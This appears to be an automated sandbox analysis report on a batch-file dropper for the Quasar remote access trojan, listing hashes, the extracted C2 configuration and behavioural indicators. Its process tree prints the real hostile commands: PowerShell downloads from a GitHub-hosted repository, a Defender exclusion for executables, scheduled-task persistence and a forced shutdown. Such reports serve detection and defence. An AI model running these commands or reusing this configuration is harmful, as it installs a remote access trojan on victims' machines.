Analysis
max time kernel: 49s
max time network: 50s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 22-11-2024 00:48
Static task: static1
Behavioral task: behavioral1
Sample: main1.bat
Resource: win7-20240903-en
Errors
General
Target: main1.bat
Size: 15KB
MD5: 837e6e693eab2459822a681dd8829347
SHA1: 77417d665e66ae2f962f52b3d7c916f0772f0615
SHA256: 57970a3c842bcaf6860a9d271b2725b08fc07a50ca18ff852983d8e80905a0c7
SHA512: 54f3d0f4a69d785dd6012f5376d131f3d4cdfa1885577c46468bf1e37aed1d7da86cc11b7efcddf53eede8a4803a16e14c008493404906e3b870ccd441278a48
SSDEEP: 384:wK1+KSlKC8kumFq/vM2pHz6YBM3P6QDSJO4ytvJ2/N2cGTuEhckk7VgFHbWvaPn0:wK1+KSlKC8++vM23b+CJXPn
Malware Config
Extracted
quasar
1.4.1
bot
wooting2000-47095.portmap.host:47095
2e05f1ef-743b-4020-b18a-7f4276517e8b
encryption_key: E83D6FC31962786DAEA703F111D2381786DF06CA
install_name: Modification1.5.14.12.exe
log_directory: Logs
reconnect_delay: 3126
startup_key: explorer.dll
subdirectory: SubDir
Signatures

Quasar family

Quasar payload (2 IoCs)
Processes:
  resource                                                                      yara_rule
  C:\Users\Admin\AppData\Local\Temp\Modification11910275.exe                    family_quasar
  behavioral2/memory/2512-49-0x00000000006C0000-0x00000000009E4000-memory.dmp   family_quasar

Blocklisted process makes network request (2 IoCs)
Processes:
  flow  pid   process
  7     3596  powershell.exe
  18    3016  powershell.exe

Processes:
  pid   process
  3596  powershell.exe
  3016  powershell.exe
  4532  powershell.exe

Downloads MZ/PE file

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
Processes:
  description        ioc                                                                                                   process
  Key value queried  \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation  Modification1.5.14.12.exe

Executes dropped EXE (2 IoCs)
Processes:
  pid   process
  2512  Modification11910275.exe
  4888  Modification1.5.14.12.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 3 IoCs)
Processes:
  flow  ioc
  18    raw.githubusercontent.com
  6     raw.githubusercontent.com
  7     raw.githubusercontent.com

Drops file in System32 directory (5 IoCs)
Processes:
  description                   ioc                                                   process
  File created                  C:\Windows\system32\SubDir\Modification1.5.14.12.exe  Modification11910275.exe
  File opened for modification  C:\Windows\system32\SubDir\Modification1.5.14.12.exe  Modification11910275.exe
  File opened for modification  C:\Windows\system32\SubDir                            Modification11910275.exe
  File opened for modification  C:\Windows\system32\SubDir\Modification1.5.14.12.exe  Modification1.5.14.12.exe
  File opened for modification  C:\Windows\system32\SubDir                            Modification1.5.14.12.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Modifies data under HKEY_USERS (15 IoCs)
Processes:
  description        ioc                                                                                                              process
  Set value (int)    \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"                                LogonUI.exe
  Set value (int)    \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"                      LogonUI.exe
  Set value (int)    \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"                       LogonUI.exe
  Set value (int)    \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"                             LogonUI.exe
  Set value (int)    \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "194"                          LogonUI.exe
  Set value (int)    \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"                 LogonUI.exe
  Set value (int)    \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"  LogonUI.exe
  Set value (int)    \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe
  Set value (int)    \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"                          LogonUI.exe
  Set value (data)   \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00  LogonUI.exe
  Set value (int)    \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"                           LogonUI.exe
  Set value (int)    \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"                          LogonUI.exe
  Key created        \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent                                LogonUI.exe
  Key created        \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History                                 LogonUI.exe
  Key created        \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM                                                           LogonUI.exe

Scheduled Task/Job: Scheduled Task (1 TTP, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
  pid   process
  2620  schtasks.exe
  4100  schtasks.exe

Suspicious behavior: EnumeratesProcesses (6 IoCs)
Processes:
  pid   process
  3596  powershell.exe
  3596  powershell.exe
  4532  powershell.exe
  4532  powershell.exe
  3016  powershell.exe
  3016  powershell.exe

Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes:
  description                       pid   process
  Token: SeDebugPrivilege           3596  powershell.exe
  Token: SeDebugPrivilege           4532  powershell.exe
  Token: SeDebugPrivilege           3016  powershell.exe
  Token: SeDebugPrivilege           2512  Modification11910275.exe
  Token: SeDebugPrivilege           4888  Modification1.5.14.12.exe
  Token: SeShutdownPrivilege        4780  shutdown.exe
  Token: SeRemoteShutdownPrivilege  4780  shutdown.exe

Suspicious use of SetWindowsHookEx (2 IoCs)
Processes:
  pid   process
  4888  Modification1.5.14.12.exe
  628   LogonUI.exe

Suspicious use of WriteProcessMemory (20 IoCs)
Processes:
  description                        pid   process                    target process
  PID 632 wrote to memory of 3596    632   cmd.exe                    powershell.exe
  PID 632 wrote to memory of 3596    632   cmd.exe                    powershell.exe
  PID 632 wrote to memory of 3900    632   cmd.exe                    cmd.exe
  PID 632 wrote to memory of 3900    632   cmd.exe                    cmd.exe
  PID 3900 wrote to memory of 2904   3900  cmd.exe                    cacls.exe
  PID 3900 wrote to memory of 2904   3900  cmd.exe                    cacls.exe
  PID 3900 wrote to memory of 4532   3900  cmd.exe                    powershell.exe
  PID 3900 wrote to memory of 4532   3900  cmd.exe                    powershell.exe
  PID 3900 wrote to memory of 3016   3900  cmd.exe                    powershell.exe
  PID 3900 wrote to memory of 3016   3900  cmd.exe                    powershell.exe
  PID 3900 wrote to memory of 2512   3900  cmd.exe                    Modification11910275.exe
  PID 3900 wrote to memory of 2512   3900  cmd.exe                    Modification11910275.exe
  PID 2512 wrote to memory of 2620   2512  Modification11910275.exe   schtasks.exe
  PID 2512 wrote to memory of 2620   2512  Modification11910275.exe   schtasks.exe
  PID 2512 wrote to memory of 4888   2512  Modification11910275.exe   Modification1.5.14.12.exe
  PID 2512 wrote to memory of 4888   2512  Modification11910275.exe   Modification1.5.14.12.exe
  PID 4888 wrote to memory of 4100   4888  Modification1.5.14.12.exe  schtasks.exe
  PID 4888 wrote to memory of 4100   4888  Modification1.5.14.12.exe  schtasks.exe
  PID 4888 wrote to memory of 4780   4888  Modification1.5.14.12.exe  shutdown.exe
  PID 4888 wrote to memory of 4780   4888  Modification1.5.14.12.exe  shutdown.exe

Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\main1.bat"
  - Suspicious use of WriteProcessMemory
  PID:632

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: Powershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/walks111551/09672018256120856125/main/installer.bat' -OutFile installer.bat"
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3596

  C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /K installer.bat
    - Suspicious use of WriteProcessMemory
    PID:3900

    C:\Windows\system32\cacls.exe
      Command line: "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
      PID:2904

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: Powershell -Command "Set-MpPreference -ExclusionExtension exe"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID:4532

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: Powershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/walks111551/09672018256120856125/main/Modification11910275.exe' -OutFile Modification11910275.exe"
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID:3016

    C:\Users\Admin\AppData\Local\Temp\Modification11910275.exe
      Command line: Modification11910275.exe
      - Executes dropped EXE
      - Drops file in System32 directory
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID:2512

      C:\Windows\SYSTEM32\schtasks.exe
        Command line: "schtasks" /create /tn "explorer.dll" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Modification1.5.14.12.exe" /rl HIGHEST /f
        - Scheduled Task/Job: Scheduled Task
        PID:2620

      C:\Windows\system32\SubDir\Modification1.5.14.12.exe
        Command line: "C:\Windows\system32\SubDir\Modification1.5.14.12.exe"
        - Checks computer location settings
        - Executes dropped EXE
        - Drops file in System32 directory
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory
        PID:4888

        C:\Windows\SYSTEM32\schtasks.exe
          Command line: "schtasks" /create /tn "explorer.dll" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Modification1.5.14.12.exe" /rl HIGHEST /f
          - Scheduled Task/Job: Scheduled Task
          PID:4100

        C:\Windows\System32\shutdown.exe
          Command line: "C:\Windows\System32\shutdown.exe" /s /t 0
          - Suspicious use of AdjustPrivilegeToken
          PID:4780

C:\Windows\system32\LogonUI.exe
  Command line: "LogonUI.exe" /flags:0x4 /state0:0xa38cc855 /state1:0x41c64e6d
  - Modifies data under HKEY_USERS
  - Suspicious use of SetWindowsHookEx
  PID:628
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 2KB
MD5: 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1: 445bf1b07223a04f8a159581a3d37d630273010f
SHA256: 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512: 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Filesize: 1KB
MD5: a5c074e56305e761d7cbc42993300e1c
SHA1: 39b2e23ba5c56b4f332b3607df056d8df23555bf
SHA256: e75b17396d67c1520afbde5ecf8b0ccda65f7833c2e7e76e3fddbbb69235d953
SHA512: c63d298fc3ab096d9baff606642b4a9c98a707150192191f4a6c5feb81a907495b384760d11cecbff904c486328072548ac76884f14c032c0c1ae0ca640cb5e8

Filesize: 944B
MD5: 692a440f9cfbeaf648632aead685a5a1
SHA1: e4e4bd8405be77294f4be5ea18b5e05b139f35af
SHA256: 3e1615e7774bd98860c984570515c293b64cf07f1b8e6688a72e78fa9ebed0f4
SHA512: c7501a0fc978d0f06f32c4a205246763796a20c0b2514f00cb6676c8c95ab38d463b87c2973ca2b9b3e2fee3bc7ded869f5896c498303397167c4b5f069db519

Filesize: 3.1MB
MD5: fa9b1524e725c4a251d07007f15fa947
SHA1: 5c023619d8180b611acb544fa1cd8bd31de9e61c
SHA256: 0cbcab350f25f5764dc967cf6f764eccdd094b1f8ca14d60a731713ace6b1aec
SHA512: dac63f0970092186a909dafeb75cee3e1ad3b393984cf78a1d88e339a39ef235567f74b7a874b237762b8a46e74f8cb319add4bcbc4bdf8f76ec8e1476fb44db

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 996B
MD5: 9573128d5eac791a88ae169d4941e267
SHA1: 5bbcbca4753c6c2e145ac68712c3eb68eb1512f3
SHA256: 1562ce54110ea27bad805f00f40e9bf78322dde78d4f900deee7e4cce17a70dd
SHA512: d2fd5846cebf28ee3b159f9743fa63d4bec31ccdb2a431305b8a80b8cbcbfddb50e9d29374d4bc381ac46a1e399fb703af5c38f83834949256d57968817e7522